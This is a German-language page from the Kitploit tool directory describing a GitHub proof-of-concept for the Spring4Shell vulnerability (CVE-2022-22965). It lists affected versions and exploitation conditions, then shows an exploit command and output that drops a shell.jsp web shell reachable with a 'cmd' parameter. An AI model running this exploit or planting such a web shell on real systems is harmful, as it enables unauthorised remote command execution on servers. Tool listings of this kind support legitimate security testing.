Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-22965 — Spring4Shell | Kitploit
Tools/GitHubGitHub/nhattanhh/cve-2022-22965
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubnhattanhh/cve-2022-22965

CVE-2022-22965

Spring4Shell

Repository anzeigen
vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-22965 Spring4Shell-PoC

Version

  • Spring Framework < 5.2.20 und 5.3.18

Gepatchte Version:

  • Spring Framework 5.3.18 und 5.2.20

  • Spring Boot 2.6.6 und 2.5.12

Details

  • Spring Core ist die Kernkomponente des Spring Framework. Es ist die Grundlage zum Aufbau anderer Komponenten im Spring Framework-Ökosystem wie Spring MVC, Spring Boot, Spring WebFlux. Der Exploit-Code ist unter den folgenden Bedingungen ausführbar:

    • JDK 9 oder höher

    • Apache Tomcat führt Servlet-Container aus

    • Verpackung als WAR

    • Paketabhängigkeiten: spring-webmvc oder spring-webflux

  • Wenn die Anwendung als ausführbare Spring Boot JAR-Datei bereitgestellt wird, was der Standard ist, ist sie von dieser Sicherheitslücke nicht betroffen.

Exploit:

root@kitploit:~
python CVE-2022-22965.py --url http://172.16.1.10:8080/helloworld/greeting

Ergebnis:

root@kitploit:~
└─$ python cve-spring4shell.py --url http://172.16.1.10:8080/helloworld/greeting
[*] Resetting Log Variables.
[*] Response code: 200
[*] Modifying Log Configurations
[*] Response code: 200
[*] Response Code: 200
[*] Resetting Log Variables.
[*] Response code: 200
[+] Exploit completed
[+] Check your target for a shell
[+] File: shell.jsp
[+] Shell should be at: http://172.16.1.10:8080/shell.jsp?cmd=id
Tool herunterladen